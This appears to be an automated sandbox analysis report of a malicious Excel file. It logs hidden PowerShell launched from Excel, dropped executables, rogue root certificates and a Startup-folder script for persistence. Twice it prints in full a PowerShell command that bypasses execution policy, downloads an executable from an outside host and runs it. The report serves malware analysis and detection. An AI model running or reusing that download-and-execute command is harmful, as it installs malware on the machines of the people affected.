Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Section loaded: bcrypt.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 7qsPAygCOx.xlsx	Initial sample: OLE zip file path = xl/media/image1.png
Source: BA230000.0.dr	Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\user\AppData\Local\Temp\tmp7752.PDBP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\svcost.PDBO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbles\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=Al$$ source: svcost.exe, 00000008.00000002.520082230.0000000005150000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp7752.exe, 00000005.00000002.488544480.000000000054F000.00000004.00000020.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515284150.0000000000540000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: i0C:\Windows\mscorlib.pdbP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: i0C:\Windows\mscorlib.pdbO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;			Jump to behavior

Source: Yara match	File source: 5.2.tmp7752.exe.4a80000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00AA189C push 0C418B00h; ret		5_2_00AA18A3
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2E010 push 14418B00h; ret		5_2_00D2E023
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2F15C push 08418B00h; ret		5_2_00D2F163
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2E17C push 0C418B00h; ret		5_2_00D2E183
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D28AB9 push 8C00670Dh; retf		5_2_00D28AC5
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D235F0 push ecx; retf		5_2_00D235F6
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2EEB0 push 0C418B00h; ret		5_2_00D2EEC3
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2D670 push 0C418B00h; ret		5_2_00D2D683
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2363B push es; retf		5_2_00D23641
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2D62A push 0C418B00h; ret		5_2_00D2D683
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2DF90 push 14418B00h; ret		5_2_00D2E023
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_00D2EFA0 push 10418B00h; ret		5_2_00D2EFB3
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_050235A6 push edi; retf		5_2_050235AC
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Code function: 5_2_0502271E push edi; retf		5_2_05022740
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0069FA88 pushfd ; retf		8_2_0069FA95
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A8AB9 push 8C00670Dh; retf		8_2_023A8AC5
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A363B push es; retf		8_2_023A3641
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_023A35F0 push ecx; retf		8_2_023A35F6
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_054035A6 push edi; retf		8_2_054035AC

Source: tmp7752.exe.2.dr	Static PE information: section name: .text entropy: 7.764858525500812
Source: svcost.exe.5.dr	Static PE information: section name: .text entropy: 7.764858525500812

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\tmp7752.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	File created: C:\Users\user\AppData\Roaming\svcost.exe			Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
